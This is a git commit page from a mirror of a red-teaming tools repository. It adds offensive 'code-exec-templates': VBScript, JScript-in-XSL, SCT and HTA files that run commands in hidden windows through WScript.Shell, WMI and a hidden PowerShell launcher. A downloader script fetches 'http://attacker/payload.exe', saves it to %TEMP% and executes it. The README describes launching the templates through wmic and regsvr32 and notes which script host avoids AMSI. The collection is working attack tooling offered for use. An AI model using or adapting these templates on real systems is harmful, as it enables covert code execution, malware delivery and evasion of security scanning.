mirror of
https://github.com/mgeeky/Penetration-Testing-Tools.git
synced 2024-12-22 17:15:06 +01:00
Added code-exec-templates
This commit is contained in:
parent
ce933bb1c5
commit
8e976e7cee
@ -52,6 +52,8 @@ cmstp.exe /ni /s cmstp.inf
|
||||
|
||||
- **`cobalt-arsenal`** - A set of my published Cobalt Strike 4.0+ compatible aggressor scripts. That includes couple of my handy utils I've used on various engagements.
|
||||
|
||||
- [**`code-exec-templates`**](https://github.com/mgeeky/Penetration-Testing-Tools/tree/master/red-teaming/code-exec-templates) - a small collection of template/backbone files for various code-execution techniques (VBScript/JScript embedded in HTA/SCT/XSL/VBS/JS)
|
||||
|
||||
- **`compressedPowershell.py`** - Creates a Powershell snippet containing GZIP-Compressed payload that will get decompressed and executed (IEX)
|
||||
. ([gist](https://gist.github.com/mgeeky/e30ceecc2082a11b99c7b24b42bd77fc))
|
||||
|
||||
|
57
red-teaming/code-exec-templates/README.md
Normal file
57
red-teaming/code-exec-templates/README.md
Normal file
@ -0,0 +1,57 @@
|
||||
### A small collection of unobfuscated code-execution primitives in different languages
|
||||
|
||||
A handy collection of small primitives/templates useulf for code-execution, downloading or otherwise offensive purposes. Whenever a quick sample of VBScript/JScript/C# code is needed - this directory should bring you one.
|
||||
|
||||
Windows Script Host (WSH) subsystem can execute VBScript/JScript scritplets using two pre-installed interpreters:
|
||||
|
||||
- `cscript.exe` - to be used for command-line, dynamic script execution. **Doesn't load AMSI**
|
||||
|
||||
- `wscript.exe` - For general scripts execution. **This one loads AMSI**
|
||||
|
||||
|
||||
#### VBScript
|
||||
|
||||
- **`download-file-and-exec.vbs`** - Downloads a binary file using `Msxml2.ServerXMLHTTP`, stores it to the disk `Adodb.Stream` and then launches it via `Wscript.Shell Run`
|
||||
|
||||
- **`wmi-exec-command.vbs`** - Example of VBScript code execution via WMI class' `Win32_Process` static method `Create`
|
||||
|
||||
- **`wscript-shell-code-exec.vbs`** - Code execution via `WScript.Shell` in a hidden window.
|
||||
|
||||
- **`wscript-shell-stdin-code-exec.vbs`** - Code execution via `WScript.Shell` in a hidden window through a command passed from StdIn to `powershell`
|
||||
|
||||
|
||||
#### JScript
|
||||
|
||||
|
||||
#### XSL
|
||||
|
||||
XSL files can be executed in the following ways:
|
||||
|
||||
- Using `wmic.exe`:
|
||||
```
|
||||
wmic os get /format:"jscript-xslt-template.xsl"
|
||||
```
|
||||
|
||||
Templates:
|
||||
|
||||
- **`hello-world-jscript-xslt.xsl`** - A sample backbone for XSLT file with JScript code showing a simple message box.
|
||||
|
||||
- **`wscript-shell-run-jscript-xslt.xsl`** - JScript XSLT with `WScript.Shell.Run` method
|
||||
|
||||
|
||||
|
||||
#### COM Scriptlets
|
||||
|
||||
Sample code execution with `regsvr32` can be following:
|
||||
```
|
||||
regsvr32 /u /n /s /i:wscript-shell-run-jscript-scriptlet.sct scrobj.dll
|
||||
```
|
||||
|
||||
- **`wscript-shell-run-jscript-scriptlet.sct`** - SCT file with JSCript code execution via `WScript.Shell.Run`
|
||||
|
||||
|
||||
#### HTA
|
||||
|
||||
HTA files are HTML Applications
|
||||
|
||||
- **`wscript-shell-run-vbscript.hta`** - A backbone for `WScript.Shell.Run` via _VBScript_
|
38
red-teaming/code-exec-templates/download-file-and-exec.vbs
Normal file
38
red-teaming/code-exec-templates/download-file-and-exec.vbs
Normal file
@ -0,0 +1,38 @@
|
||||
'
|
||||
' Example of downloading a binary file from the URL, saving it to the
|
||||
' local filesystem and then launching.
|
||||
'
|
||||
' Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
||||
' (https://github.com/mgeeky)
|
||||
'
|
||||
|
||||
downloadURL = "http://attacker/payload.exe"
|
||||
saveAs = "%TEMP%\foo.exe"
|
||||
parameters = ""
|
||||
|
||||
Dim sh: Set sh = CreateObject("WScript.Shell")
|
||||
out = sh.ExpandEnvironmentStrings(saveAs)
|
||||
|
||||
' STEP 1: Download File
|
||||
Dim xhr: Set xhr = CreateObject("Msxml2.ServerXMLHTTP")
|
||||
xhr.Open "GET", downloadURL, False
|
||||
xhr.Send
|
||||
|
||||
' STEP 2: Save binary file
|
||||
If xhr.Status = 200 Then
|
||||
With CreateObject("Adodb.Stream")
|
||||
.Open
|
||||
.Type = 1
|
||||
.write xhr.responseBody
|
||||
.savetofile out, 2
|
||||
End With
|
||||
|
||||
' STEP 3: Execute file
|
||||
cmd = out & " " & parameters
|
||||
MsgBox cmd
|
||||
sh.Run cmd, 0, False
|
||||
|
||||
End If
|
||||
|
||||
Set sh = Nothing
|
||||
Set xhr = Nothing
|
15
red-teaming/code-exec-templates/hello-world-jscript-xslt.xsl
Normal file
15
red-teaming/code-exec-templates/hello-world-jscript-xslt.xsl
Normal file
@ -0,0 +1,15 @@
|
||||
<?xml version='1.0'?>
|
||||
<stylesheet
|
||||
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
|
||||
xmlns:user="placeholder"
|
||||
version="1.0">
|
||||
<output method="text"/>
|
||||
<ms:script implements-prefix="user" language="JScript">
|
||||
<![CDATA[
|
||||
|
||||
// Hello world
|
||||
var shell = new ActiveXObject("WScript.Shell");
|
||||
shell.Popup("Hello world from JScript XSL!");
|
||||
|
||||
]]> </ms:script>
|
||||
</stylesheet>
|
20
red-teaming/code-exec-templates/wmi-exec-command.vbs
Normal file
20
red-teaming/code-exec-templates/wmi-exec-command.vbs
Normal file
@ -0,0 +1,20 @@
|
||||
'
|
||||
' This script uses WMI class' Win32_Process static method Create to
|
||||
' execute given command in a hidden window (ShowWindow = 12).
|
||||
'
|
||||
' Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
||||
' (https://github.com/mgeeky)
|
||||
'
|
||||
|
||||
command = "notepad.exe"
|
||||
computer = "."
|
||||
|
||||
Set wmi = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" _
|
||||
& computer & "\root\cimv2")
|
||||
|
||||
Set startup = wmi.Get("Win32_ProcessStartup")
|
||||
Set conf = startup.SpawnInstance_
|
||||
conf.ShowWindow = 12
|
||||
|
||||
Set proc = GetObject("winmgmts:root\cimv2:Win32_Process")
|
||||
proc.Create command, Null, conf, intProcessID
|
13
red-teaming/code-exec-templates/wscript-shell-code-exec.vbs
Normal file
13
red-teaming/code-exec-templates/wscript-shell-code-exec.vbs
Normal file
@ -0,0 +1,13 @@
|
||||
'
|
||||
' This script uses classic WScript.Shell Run method to
|
||||
' execute given command in a hidden window (second param = 0)
|
||||
'
|
||||
' Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
||||
' (https://github.com/mgeeky)
|
||||
'
|
||||
|
||||
command = "notepad.exe"
|
||||
|
||||
With CreateObject("WScript.Shell")
|
||||
.Run command, 0, False
|
||||
End With
|
@ -0,0 +1,15 @@
|
||||
<?XML version="1.0"?>
|
||||
<scriptlet>
|
||||
<registration
|
||||
progid="Foo"
|
||||
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
|
||||
<script language="JScript">
|
||||
<![CDATA[
|
||||
|
||||
var command = "notepad.exe";
|
||||
var r = new ActiveXObject("WScript.Shell").Run(command);
|
||||
|
||||
]]>
|
||||
</script>
|
||||
</registration>
|
||||
</scriptlet>
|
@ -0,0 +1,14 @@
|
||||
<?xml version='1.0'?>
|
||||
<stylesheet
|
||||
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
|
||||
xmlns:user="placeholder"
|
||||
version="1.0">
|
||||
<output method="text"/>
|
||||
<ms:script implements-prefix="user" language="JScript">
|
||||
<![CDATA[
|
||||
|
||||
var command = "notepad";
|
||||
var r = new ActiveXObject("WScript.Shell").Run(command);
|
||||
|
||||
]]> </ms:script>
|
||||
</stylesheet>
|
@ -0,0 +1,14 @@
|
||||
<html>
|
||||
<head>
|
||||
<script language="VBScript">
|
||||
Sub foo
|
||||
command = "notepad.exe"
|
||||
Set objShell = CreateObject("Wscript.Shell")
|
||||
objShell.Run command
|
||||
End Sub
|
||||
foo()
|
||||
</script>
|
||||
</head>
|
||||
<body>
|
||||
</body>
|
||||
</html>
|
@ -0,0 +1,19 @@
|
||||
'
|
||||
' This script uses classic WScript.Shell Exec method to
|
||||
' execute given command in a hidden window via StdIn passed to a dedicated
|
||||
' launcher command (powershell.exe in this example).
|
||||
'
|
||||
' Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
||||
' (https://github.com/mgeeky)
|
||||
'
|
||||
|
||||
command = "notepad.exe"
|
||||
launcher = "powershell -nop -w hid -Command -"
|
||||
|
||||
With CreateObject("WScript.Shell")
|
||||
With .Exec(launcher)
|
||||
.StdIn.WriteLine command
|
||||
.StdIn.WriteBlankLines 1
|
||||
.Terminate
|
||||
End With
|
||||
End With
|
Loading…
Reference in New Issue
Block a user